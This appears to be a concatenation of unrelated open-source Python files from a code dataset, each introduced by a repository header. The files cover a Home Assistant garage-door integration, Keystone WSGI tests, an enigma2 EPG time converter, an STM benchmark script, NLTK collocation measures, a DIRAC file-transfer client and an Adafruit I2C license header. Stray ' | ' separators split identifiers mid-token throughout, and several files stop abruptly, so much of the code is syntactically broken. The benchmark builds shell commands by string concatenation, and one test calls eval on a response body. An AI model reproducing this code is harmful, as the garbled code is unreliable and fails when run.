_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup OpenGarage covers."""
covers = []
devices = config.get(CONF_COVERS)
for device_id, device_config in devices.items():
args = {
CONF_NAME: device_config.get(CONF_NAME),
CONF_HOST: device_config.get(CONF_HOST),
CONF_PORT: device_config.get(CONF_PORT),
"device_id": device_config.get(CONF_DEVICE, device_id),
CONF_DEVICEKEY: device_config.get(CONF_DEVICEKEY)
}
covers.append(OpenGarageCover(hass, args))
add_devices(covers, True)
class OpenGarageCover(CoverDevice):
"""Representation of a OpenGarage cover."""
# pylint: disable=no-self-use
def __init__(self, hass, args):
"""Initialize the cover."""
self.opengarage_url = 'http://{}:{}'.format(
args[CONF_HOST],
args[CONF_PORT])
self.hass = hass
self._name = args[CONF_NAME]
self.device_id = args['device_id']
self._devicekey = args[CONF_DEVICEKEY]
self._state = STATE_UNKNOWN
self._state_before_move = None
self.dist = None
self.signal = None
self._available = True
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def device_state_attributes(self):
"""Return the device state attributes."""
data = {}
if self.signal is not None:
data[ATTR_SIGNAL_STRENGTH] = self.signal
if self.dist is not None:
data[ATTR_DISTANCE_SENSOR] = self.dist
if self._state is not None:
data[ATTR_DOOR_STATE] = self._state
return data
@property
def is_closed(self):
"""Return if the cover is closed."""
if self._state == STATE_UNKNOWN:
return None
else:
return self._state in [STATE_CLOSED, STATE_OPENING]
def close_cover(self):
"""Close the cover."""
if self._state not in [STATE_CLOSED, STATE_CLOSING]:
self._state_before_move = self._state
self._state = STATE_CLOSING
self._push_button()
def open_cover(self):
"""Open the cover."""
if self._state not in [STATE_OPEN, STATE_OPENING]:
self._state_before_move = self._state
self._state = STATE_OPENING
self._push_button()
def update(self):
"""Get updated status from API."""
try:
status = self._get_status()
if self._name is None:
if status["name"] is not None:
self._name = status["name"]
state = STATES_MAP.get(status.get('door'), STATE_UNKNOWN)
if self._state_before_move is not None:
if self._state_before_move != state:
self._state = state
self._state_before_move = None
else:
self._state = state
_LOGGER.debug("%s status: %s", self._name, self._state)
self.signal = status.get('rssi')
self.dist = status.get('dist')
self._available = True
except (requests.exceptions.RequestException) as ex:
_LOGGER.error('Unable to connect to OpenGarage device: %(reason)s',
dict(reason=ex))
self._state = STATE_OFFLINE
def _get_status(self):
"""Get latest status."""
url = '{}/jc'.format(self.opengarage_url)
ret = requests.get(url, t | imeout=10)
return ret.json()
def _push_butt | on(self):
"""Send commands to API."""
url = '{}/cc?dkey={}&click=1'.format(
self.opengarage_url, self._devicekey)
try:
response = requests.get(url, timeout=10).json()
if response["result"] == 2:
_LOGGER.error("Unable to control %s: device_key is incorrect.",
self._name)
self._state = self._state_before_move
self._state_before_move = None
except (requests.exceptions.RequestException) as ex:
_LOGGER.error('Unable to connect to OpenGarage device: %(reason)s',
dict(reason=ex))
self._state = self._state_before_move
self._state_before_move = None
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return 'garage'
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_OPEN | SUPPORT_CLOSE
|
atheendra/access_keys | keystone/tests/test_wsgi.py | Python | apache-2.0 | 12,889 | 0 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
import socket
import uuid
from babel import localedata
import mock
import webob
from keystone.common import environment
from keystone.common import wsgi
from keystone import exception
from keystone.openstack.common.fixture import mockpatch
from keystone.openstack.common import gettextutils
from keystone.openstack.common.gettextutils import _
from keystone.openstack.common import jsonutils
from keystone import tests
class FakeApp(wsgi.Application):
def index(self, context):
return {'a': 'b'}
class BaseWSGITest(tests.TestCase):
def setUp(self):
self.app = FakeApp()
super(BaseWSGITest, self).setUp()
def _make_request(self, url='/'):
req = webob.Request.blank(url)
args = {'action': 'index', 'controller': None}
req.environ['wsgiorg.routing_args'] = [None, args]
return req
class ApplicationTest(BaseWSGITest):
def test_response_content_type(self):
req = self._make_request()
resp = req.get_response(self.app)
self.assertEqual(resp.content_type, 'application/json')
def test_query_string_available(self):
class FakeApp(wsgi.Application):
def index(self, context):
return context['query_string']
req = self._make_request(url='/?1=2')
resp = req.get_response(FakeApp())
self.assertEqual(jsonutils.loads(resp.body), {'1': '2'})
def test_headers_available(self):
class FakeApp(wsgi.Application):
def index(self, context):
return context['headers']
app = FakeApp()
req = self._make_request(url='/?1=2')
req.headers['X-Foo'] = "bar"
resp = req.get_response(app)
self.assertIn('X-Foo', eval(resp.body))
def test_render_response(self):
data = {'attribute': 'value'}
body = '{"attribute": "value"}'
resp = wsgi.render_response(body=data)
self.assertEqual(resp.status, '200 OK')
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, body)
self.assertEqual(resp.headers.get('Vary'), 'X-Auth-Token')
self.assertEqual(resp.headers.get('Content-Length'), str(len(body)))
def test_render_response_custom_status(self):
resp = wsgi.render_response(status=(501, 'Not Implemented'))
self.assertEqual(resp.status, '501 Not Implemented')
self.assertEqual(resp.status_int, 501)
def test_render_response_custom_headers(self):
resp = wsgi.render_response(headers=[('Custom-Header', 'Some-Value')])
self.assertEqual(resp.headers.get('Custom-Header'), 'Some-Value')
self.assertEqual(resp.headers.get('Vary'), 'X-Auth-Token')
def test_render_response_no_body(self):
resp = wsgi.render_response()
self.assertEqual(resp.status, '204 No Content')
self.assertEqual(resp.status_int, 204)
self.assertEqual(resp.body, '')
self.assertEqual(resp.headers.get('Content-Length'), '0')
self.assertIsNone(resp.headers.get('Content-Type'))
def test_application_local_config(self):
class FakeApp(wsgi.Application):
def __init__(self, *args, **kwargs):
self.kwargs = kwargs
app = FakeApp.factory({}, testkey="test")
self.assertIn("testkey", app.kwargs)
self.assertEqual("test", app.kwargs["testkey"])
def test_render_exception(self):
e = exception.Unauthorized(message=u'\u7f51\u7edc')
resp = wsgi.render_exception(e)
self.assertEqual(resp.status_int, 401)
def test_render_exception_host(self):
e = exception.Unauthorized(message=u'\u7f51\u7edc')
context = {'host_url': 'http://%s:5000' % uuid.uuid4().hex}
resp = wsgi.render_exception(e, context=context)
self.assertEqual(resp.status_int, 401)
class ExtensionRouterTest(BaseWSGITest):
def test_extensionrouter_local_config(self):
class FakeRouter(wsgi.ExtensionRouter):
def __init__(self, *args, **kwargs):
self.kwargs = kwargs
factory = FakeRouter.factory({}, testkey="test")
app = factory(self.app)
self.assertIn("testkey", app.kwargs)
self.assertEqual("test", app.kwargs["testkey"])
class MiddlewareTest(BaseWSGITest):
def test_middleware_request(self):
class FakeMiddleware(wsgi.Middleware):
def process_request(self, req):
req.environ['fake_request'] = True
return req
req = self._make_request()
resp = FakeMiddleware(None)(req)
self.assertIn('fake_request', resp.environ)
| def test_middleware_response(self):
class FakeMiddleware(wsgi. | Middleware):
def process_response(self, request, response):
response.environ = {}
response.environ['fake_response'] = True
return response
req = self._make_request()
resp = FakeMiddleware(self.app)(req)
self.assertIn('fake_response', resp.environ)
def test_middleware_bad_request(self):
class FakeMiddleware(wsgi.Middleware):
def process_response(self, request, response):
raise exception.Unauthorized()
req = self._make_request()
req.environ['REMOTE_ADDR'] = '127.0.0.1'
resp = FakeMiddleware(self.app)(req)
self.assertEqual(resp.status_int, exception.Unauthorized.code)
def test_middleware_type_error(self):
class FakeMiddleware(wsgi.Middleware):
def process_response(self, request, response):
raise TypeError()
req = self._make_request()
req.environ['REMOTE_ADDR'] = '127.0.0.1'
resp = FakeMiddleware(self.app)(req)
# This is a validationerror type
self.assertEqual(resp.status_int, exception.ValidationError.code)
def test_middleware_exception_error(self):
exception_str = 'EXCEPTIONERROR'
class FakeMiddleware(wsgi.Middleware):
def process_response(self, request, response):
raise exception.UnexpectedError(exception_str)
def do_request():
req = self._make_request()
resp = FakeMiddleware(self.app)(req)
self.assertEqual(resp.status_int, exception.UnexpectedError.code)
return resp
# Exception data should not be in the message when debug is False
self.config_fixture.config(debug=False)
self.assertNotIn(exception_str, do_request().body)
# Exception data should be in the message when debug is True
self.config_fixture.config(debug=True)
self.assertIn(exception_str, do_request().body)
def test_middleware_local_config(self):
class FakeMiddleware(wsgi.Middleware):
def __init__(self, *args, **kwargs):
self.kwargs = kwargs
factory = FakeMiddleware.factory({}, testkey="test")
app = factory(self.app)
self.assertIn("testkey", app.kwargs)
self.assertEqual("test", app.kwargs["testkey"])
class LocalizedResponseTest(tests.TestCase):
def setUp(self):
super(LocalizedResponseTest, self).setUp()
gettextutils._AVAILABLE_LANGUAGES.clear()
self.addCleanup(gettextutils._AVAILABLE_LANGUAGES.clear)
def _set_expected_languages(self, all_locales, avail_locales=None):
# Override localedata.locale_identifiers to return some locales.
def returns_some_locales(*args, **kwargs):
return all_locales
self.useFixture(mockpatch.PatchObject(
|
atvcaptain/enigma2 | lib/python/Components/Converter/EventTime.py | Python | gpl-2.0 | 7,587 | 0.027547 | from __future__ import absolute_import
from Components.Converter.Converter import Converter
from Components.Converter.Poll import Poll
from time import time
from Components.Element import cached, ElementError
from Components.config import config
from enigma import eEPGCache
class EventTime(Poll, Converter, object):
STARTTIME = 0
ENDTIME = 1
REMAINING = 2
REMAINING_VFD = 3
PROGRESS = 4
DURATION = 5
ELAPSED = 6
ELAPSED_VFD = 7
NEXT_START_TIME = 8
NEXT_END_TIME = 9
NEXT_DURATION = 10
THIRD_START_TIME = 11
THIRD_END_TIME = 12
THIRD_DURATION = 13
TIMES = 14
NEXT_TIMES = 15
THIRD_TIMES = 16
def __init__(self, type):
Converter.__init__(self, type)
Poll.__init__(self)
self.epgcache = eEPGCache.getInstance()
if type == "EndTime":
self.type = self.ENDTIME
elif type == "Remaining":
self.type = self.REMAINING
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "VFDRemaining":
self.type = self.REMAINING_VFD
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "StartTime":
self.type = self.STARTTIME
elif type == "Duration":
self.type = self.DURATION
elif type == "Progress":
self.type = self.PROGRESS
self.poll_interval = 30 * 1000
self.poll_enabled = True
elif type == "Elapsed":
self.type = self.ELAPSED
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "VFDElapsed":
self.type = self.ELAPSED_VFD
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "NextStartTime":
self.type = self.NEXT_START_TIME
elif type == "NextEndTime":
self.type = self.NEXT_END_TIME
elif type == "NextDuration":
self.type = self.NEXT_DURATION
elif type == "ThirdStartTime":
self.type = self.THIRD_START_TIME
elif ty | pe == "ThirdEndTime":
self.type = self.THIRD_END_TIME
elif type == "ThirdDuration":
self.type = self.THIRD_DURATION
elif type == "Times":
self.type = self.TIMES |
elif type == "NextTimes":
self.type = self.NEXT_TIMES
elif type == "ThirdTimes":
self.type = self.THIRD_TIMES
else:
raise ElementError("'%s' is not <StartTime|EndTime|Remaining|Elapsed|Duration|Progress|VFDRemaining|VFDElapsed|NextStartTime|NextEndTime|NextDuration|ThirdStartTime|ThirdEndTime|ThirdDuration|Times|NextTimes|ThirdTimes> for EventTime converter" % type)
@cached
def getTime(self):
assert self.type != self.PROGRESS
event = self.source.event
if event is None:
return None
st = event.getBeginTime()
if self.type == self.STARTTIME:
return st
duration = event.getDuration()
if self.type == self.DURATION:
return duration
et = st + duration
if self.type == self.ENDTIME:
return et
if self.type == self.TIMES:
return (st, et)
if self.type in (self.REMAINING, self.REMAINING_VFD, self.ELAPSED, self.ELAPSED_VFD):
now = int(time())
remaining = et - now
if remaining < 0:
remaining = 0
start_time = event.getBeginTime()
end_time = start_time + duration
elapsed = now - start_time
if start_time <= now <= end_time:
if self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
else:
return duration, None
elif self.type in (self.NEXT_START_TIME, self.NEXT_END_TIME, self.NEXT_DURATION, self.THIRD_START_TIME, self.THIRD_END_TIME, self.THIRD_DURATION, self.NEXT_TIMES, self.THIRD_TIMES):
reference = self.source.service
info = reference and self.source.info
if info is None:
return
test = ['IBDCX', (reference.toString(), 1, -1, 1440)] # search next 24 hours
self.list = [] if self.epgcache is None else self.epgcache.lookupEvent(test)
if self.list:
try:
if self.type == self.NEXT_START_TIME and self.list[1][1]:
return self.list[1][1]
elif self.type == self.NEXT_DURATION and self.list[1][2]:
return self.list[1][2]
elif self.type == self.NEXT_END_TIME and self.list[1][1] and self.list[1][2]:
return int(self.list[1][1]) + int(self.list[1][2])
elif self.type == self.NEXT_TIMES and self.list[1][1] and self.list[1][2]:
return (int(self.list[1][1]), int(self.list[1][1]) + int(self.list[1][2]))
elif self.type == self.THIRD_START_TIME and self.list[2][1]:
return self.list[2][1]
elif self.type == self.THIRD_DURATION and self.list[2][2]:
return self.list[2][2]
elif self.type == self.THIRD_END_TIME and self.list[2][1] and self.list[2][2]:
return int(self.list[2][1]) + int(self.list[2][2])
elif self.type == self.THIRD_TIMES and self.list[2][1] and self.list[2][2]:
return (int(self.list[2][1]), int(self.list[2][1]) + int(self.list[2][2]))
else:
# failed to return any epg data.
return None
except:
# failed to return any epg data.
return None
@cached
def getValue(self):
assert self.type == self.PROGRESS
event = self.source.event
if event is None:
return None
progress = int(time()) - event.getBeginTime()
duration = event.getDuration()
if duration > 0 and progress >= 0:
if progress > duration:
progress = duration
return progress * 1000 / duration
else:
return None
time = property(getTime)
value = property(getValue)
range = 1000
def changed(self, what):
Converter.changed(self, what)
if self.type == self.PROGRESS and len(self.downstream_elements):
if not self.source.event and self.downstream_elements[0].visible:
self.downstream_elements[0].visible = False
elif self.source.event and not self.downstream_elements[0].visible:
self.downstream_elements[0].visible = True
|
ml9951/ghc | libraries/pastm/examples/damp-comparing-linked-lists/bench.py | Python | bsd-3-clause | 1,511 | 0.017869 | #!/usr/bin/env python
import argparse, subprocess, pdb, re
parser = argparse.ArgumentParser()
parser.add_argument("-iters", type=int, help="Number of iterations for each STM implementation", default=3)
parser | .add_argument("-opt", type=str, help="Optimization level", default="")
parser.add_argument("-cores", type=int, help= | "Number of cores to go up to", default=4)
parser.add_argument("-stm", type=str, help="Which STM to use", default="partial")
args = parser.parse_args()
makeCmds = [('mvar', 'mvar') , ('partial straight', 'straightForwardParital'), ('partial dissected', 'dissectedPartial'), ('cas', 'cas')]
filename = 'Times.txt'
l = ' '
for i in range(args.cores):
for j in range(args.iters):
l = l + 'C' + str(i) + '-' + str(j) + ' '
subprocess.Popen('echo \"' + l + '\" > ' + filename, shell = True).wait()
for cmd, prog in makeCmds:
subprocess.Popen('make ' + cmd + ' OPT=\"' + args.opt + '\"', shell = True).wait()
l = cmd + ' '
for i in range(args.cores):
for j in range(args.iters):
print('./' + prog + args.opt + ' +RTS -N' + str(i+1) + '(iteration ' + str(j) + ')')
x = subprocess.check_output('./' + prog + args.opt + ' +RTS -N' + str(i+1), shell=True)
time = re.search('Time = .*', str(x))
time = re.search('[0-9]*\.[0-9]*', time.group(0))
l = l + time.group(0) + ' '
subprocess.Popen('echo \"' + l + '\" >> ' + filename, shell = True).wait()
|
adazey/Muzez | libs/nltk/metrics/association.py | Python | gpl-3.0 | 15,878 | 0.0017 | # Natural Language Toolkit: Ngram Association Measures
#
# Copyright (C) 2001-2016 NLTK Project
# Author: Joel Nothman <jnothman@student.usyd.edu.au>
# URL: <http://nltk.org>
# For license information, see LICENSE.TXT
"""
Provides scoring functions for a number of association measures through a
generic, abstract implementation in ``NgramAssocMeasures``, and n-specific
``BigramAssocMeasures`` and ``TrigramAssocMeasures``.
"""
from __future__ import division
import math as _math
from functools import reduce
_log2 = lambda x: _math.log(x, 2.0)
_ln = _math.log
_product = lambda s: reduce(lambda x, y: x * y, s)
_SMALL = 1e-20
try:
from scipy.stats import fisher_exact
except ImportError:
def fisher_exact(*_args, **_kwargs):
raise NotImplementedError
### Indices to marginals arguments:
NGRAM = 0
"""Marginals index for the ngram count"""
UNIGRAMS = -2
"""Marginals index for a tuple of each unigram count"""
TOTAL = -1
"""Marginals index for the number of words in the data"""
class NgramAssocMeasures(object):
"""
An abstract class defining a collection of generic association measures.
Each public method returns a score, taking the following arguments::
score_fn(count_of_ngram,
(count_of_n-1gram_1, ..., count_of_n-1gram_j),
(count_of_n-2gram_1, ..., count_of_n-2gram_k),
...,
(count_of_1gram_1, ..., count_of_1gram_n),
count_of_total_words)
See ``BigramAssocMeasures`` and ``TrigramAssocMeasures``
Inheriting classes should define a property _n, and a method _contingency
which calculates contingency values from marginals in order for all
association measures defined here to be usable.
"""
_n = 0
@staticmethod
def _contingency(*marginals):
"""Calculates values of a contingency table from marginal values."""
raise NotImplementedError("The contingency table is not available"
"in the general ngram case")
@staticmethod
def _marginals(*contingency):
"""Calculates values of contingency table marginals from its values."""
raise NotImplementedError("The contingency table is not available"
"in the general ngram case")
@classmethod
def _expected_values(cls, cont):
"""Calculates expected values for a contingency table."""
n_all = sum(cont)
bits = [1 << i for i in range(cls._n)]
# For each contingency table cell
for i in range(len(cont)):
# Yield the expected value
yield (_product(sum(cont[x] for x in range(2 ** cls._n)
if (x & j) == (i & j))
for j in bits) /
(n_all ** (cls._n - 1)))
@staticmethod
def raw_freq(*marginals):
"""Scores ngrams by their frequency"""
return marginals[NGRAM] / marginals[TOTAL]
@classmethod
def student_t(cls, *marginals):
"""Scores ngrams using Student's t test with independence hypothesis
for unigrams, as in Manning and Schutze 5.3.1.
"""
return ((marginals[NGRAM] -
_product(marginals[UNIGRAMS]) /
(marginals[TOTAL] ** (cls._n - 1))) /
(marginals[NGRAM] + _SMALL) ** .5)
@classmethod
def chi_sq(cls, *marginals):
"""Scores ngrams using Pearson's chi-square as in Manning and Schutze
5.3.3.
"""
cont = cls._contingency(*marginals)
exps = cls._expected_values(cont)
return sum((obs - exp) ** 2 / (exp + _SMALL)
for obs, exp in zip(cont, exps))
@staticmethod
def mi_like(*marginals, **kwargs):
"""Scores ngrams using a variant of mutual information. The keyword
argument power sets an exponent (default 3) for the numerator. No
logarithm of the result is calculated.
"""
return (marginals[NGRAM] ** kwargs.get('power', 3) /
_product(marginals[UNIGRAMS]))
@classmethod
def pmi(cls, *marginals):
"""Scores ngrams by pointwise mutual information, as in Manning and
Schutze 5.4.
"""
return (_log2(marginals[NGRAM] * marginals[TOTAL] ** (cls._n - 1)) -
_log2(_product(marginals[UNIGRAMS])))
@classmethod
def likelihood_ratio(cls, *marginals):
"""Scores ngrams using likelihood ratios as in Manning and Schutze 5.3.4.
"""
cont = cls._contingency(*marginals)
return (cls._n *
sum(obs * _ln(obs / (exp + _SMALL) + _SMALL)
for obs, exp in zip(cont, cls._expected_values(cont))))
@classmethod
def poisson_stirling(cls, *marginals):
"""Scores ngrams using the Poisson-Stirling measure."""
exp = (_product(marginals[UNIGRAMS]) /
(marginals[TOTAL] ** (cls._n - 1)))
return marginals[NGRAM] * (_log2(marginals[NGRAM] / exp) - 1)
@classmethod
def jaccard(cls, *marginals):
"""Scores ngrams using the Jaccard index."""
cont = cls._contingency(*marginals)
return cont[0] / sum(cont[:-1])
class BigramAssocMeasures(NgramAssocMeasures):
"""
A collection of bigram association measures. Each association measure
is provided as a function with three arguments::
bigram_score_fn(n_ii, (n_ix, n_xi), n_xx)
The arguments constitute the marginals of a contingency table, counting
the occurrences of particular events | in a corpus. The letter i in the
suffix refers to the appearance of the word in question, while x indicates
the appearance of any word. Thus, for example:
n_ii counts (w1, w2), i.e. the bigram being scored
n_ | ix counts (w1, *)
n_xi counts (*, w2)
n_xx counts (*, *), i.e. any bigram
This may be shown with respect to a contingency table::
w1 ~w1
------ ------
w2 | n_ii | n_oi | = n_xi
------ ------
~w2 | n_io | n_oo |
------ ------
= n_ix TOTAL = n_xx
"""
_n = 2
@staticmethod
def _contingency(n_ii, n_ix_xi_tuple, n_xx):
"""Calculates values of a bigram contingency table from marginal values."""
(n_ix, n_xi) = n_ix_xi_tuple
n_oi = n_xi - n_ii
n_io = n_ix - n_ii
return (n_ii, n_oi, n_io, n_xx - n_ii - n_oi - n_io)
@staticmethod
def _marginals(n_ii, n_oi, n_io, n_oo):
"""Calculates values of contingency table marginals from its values."""
return (n_ii, (n_oi + n_ii, n_io + n_ii), n_oo + n_oi + n_io + n_ii)
@staticmethod
def _expected_values(cont):
"""Calculates expected values for a contingency table."""
n_xx = sum(cont)
# For each contingency table cell
for i in range(4):
yield (cont[i] + cont[i ^ 1]) * (cont[i] + cont[i ^ 2]) / n_xx
@classmethod
def phi_sq(cls, *marginals):
"""Scores bigrams using phi-square, the square of the Pearson correlation
coefficient.
"""
n_ii, n_io, n_oi, n_oo = cls._contingency(*marginals)
return ((n_ii*n_oo - n_io*n_oi)**2 /
((n_ii + n_io) * (n_ii + n_oi) * (n_io + n_oo) * (n_oi + n_oo)))
@classmethod
def chi_sq(cls, n_ii, n_ix_xi_tuple, n_xx):
"""Scores bigrams using chi-square, i.e. phi-sq multiplied by the number
of bigrams, as in Manning and Schutze 5.3.3.
"""
(n_ix, n_xi) = n_ix_xi_tuple
return n_xx * cls.phi_sq(n_ii, (n_ix, n_xi), n_xx)
@classmethod
def fisher(cls, *marginals):
"""Scores bigrams using Fisher's Exact Test (Pedersen 1996). Less
sensitive to small counts than PMI or Chi Sq, but also more expensive
to compute. Requires scipy.
"""
n_ii, n_io, n_oi, n_oo = |
andresailer/DIRAC | Core/DISET/TransferClient.py | Python | gpl-3.0 | 6,920 | 0.034682 | """ This is for transfers what RPCClient is for RPC calls
"""
__RCSID__ = "$Id$"
import os
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Utilities import File
from DIRAC.Core.DISET.private.BaseClient import BaseClient
from DIRAC.Core.DISET.private.FileHelper import FileHelper
class TransferClient( BaseClient ):
def _sendTransferHeader( self, actionName, fileInfo ):
"""
Send the header of the transfer
:type actionName: string
:param actionName: Action to execute
:type fileInfo: tuple
:param fileInfo: Information of the target file/bulk
:return: S_OK/S_ERROR
"""
retVal = self._connect()
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
#FFC -> File from Client
retVal = self._proposeAction( transport, ( "FileTransfer", actionName ) )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.sendData( S_OK( fileInfo ) )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
if not retVal[ 'OK' ]:
return retVal
return S_OK( ( trid, transport ) )
except Exception as e:
self._disconnect( trid )
return S_ERROR( "Cound not request transfer: %s" % str( e ) )
def sendFile( self, filename, fileId, token = "" ):
"""
Send a file to server
:type filename : string / file descriptor / file object
:param filename : File to send to server
:type fileId : any
:param fileId : Identification of the file being sent
:type token : string
:param token : Optional token for the file
:return : S_OK/S_ERROR
"""
fileHelper = FileHelper()
if "NoCheckSum" in token:
fileHelper.disableCheckSum()
retVal = fileHelper.getFileDescriptor( filename, "r" )
if not retVal[ 'OK' ]:
return retVal
fd = retVal[ 'Value' ]
retVal = self._sendTransferHeader( "FromClient", ( fileId, token, File.getSize( filename ) ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper.setTransport( transport )
retVal = fileHelper.FDToNetwork( fd )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
return retVal
finally:
self._disconnect( trid )
def receiveFile( self, filename, fileId, token = "" ):
"""
Receive a file from the server
:type filename : string / file descriptor / file object
:param filename : File to receive from server
:type fileId : any
:param fileId : Identification of the file being received
:type token : string
:param token : Optional token for the file
:return : S_OK/S_ERROR
"""
fileHelper = FileHelper()
if "NoCheckSum" in token:
fileHelper.disableCheckSum()
retVal = fileHelper.getDataSink( filename )
if not retVal[ 'OK' ]:
return retVal
dS = retVal[ 'Value' ]
closeAfterUse = retVal[ 'closeAfterUse' ]
retVal = self._sendTransferHeader( "ToClient", ( fileId, token ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper.setTransport( transport )
retVal = fileHelper.networkToDataSink( dS )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
if closeAfterUse:
dS.close()
return retVal
finally:
self._disconnect( trid )
def __checkFileList( self, fileList ):
bogusEntries = []
for entry in fileList:
if not os.path.exists( entry ):
bogusEntries.append( entry )
return bogusEntries
def sendBulk( self, fileList, bulkId, token = "", compress = True, bulkSize = -1, onthefly = True ):
"""
Send a bulk of files to server
:type fileList : list of ( string / file descriptor / file object )
:param fileList : Files to send to server
:type bulkId : any
:param bulkId : Identification of the files being sent
:type token : string
:param token : Token for the bulk
:type compress : boolean
:param compress : Enable compression for the bulk. By default its True
:type bulkSize : integer
:param bulkSize : Optional size of the bulk
:return : S_OK/S_ERROR
"""
bogusEntries = self.__checkFileList( fileList )
if bogusEntries:
return S_ERROR( "Some files or directories don't exist :\n\t%s" % "\n\t".join( bogusEntries ) )
if compress:
bulkId = "%s.tar.bz2" % bulkId
else:
bul | kId = "%s.tar" % bulkId
retVal = self._sendTransferHeader( "BulkFromClient", ( bulkId, token, bulkSize ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper = FileHelper( transport )
retVal = fileHelper.bulkToNetwork( fileList, compr | ess, onthefly )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
return retVal
finally:
self._disconnect( trid )
def receiveBulk( self, destDir, bulkId, token = "", compress = True ):
"""
Receive a bulk of files from server
:type destDir : list of ( string / file descriptor / file object )
:param destDir : Files to receive from server
:type bulkId : any
:param bulkId : Identification of the files being received
:type token : string
:param token : Token for the bulk
:type compress : boolean
:param compress : Enable compression for the bulk. By default its True
:return : S_OK/S_ERROR
"""
if not os.path.isdir( destDir ):
return S_ERROR( "%s is not a directory for bulk receival" % destDir )
if compress:
bulkId = "%s.tar.bz2" % bulkId
else:
bulkId = "%s.tar" % bulkId
retVal = self._sendTransferHeader( "BulkToClient", ( bulkId, token ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper = FileHelper( transport )
retVal = fileHelper.networkToBulk( destDir, compress )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
return retVal
finally:
self._disconnect( trid )
def listBulk( self, bulkId, token = "", compress = True ):
"""
List the contents of a bulk
:type bulkId : any
:param bulkId : Identification of the bulk to list
:type token : string
:param token : Token for the bulk
:type compress : boolean
:param compress : Enable compression for the bulk. By default its True
:return : S_OK/S_ERROR
"""
if compress:
bulkId = "%s.tar.bz2" % bulkId
else:
bulkId = "%s.tar" % bulkId
trid = None
retVal = self._sendTransferHeader( "ListBulk", ( bulkId, token ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
response = transport.receiveData( 1048576 )
return response
finally:
self._disconnect( trid )
|
adafruit/Adafruit_Python_GPIO | Adafruit_GPIO/I2C.py | Python | mit | 9,083 | 0.002752 | # Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
# Based on Adafruit_I2C.py created by Kevin Townsend.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
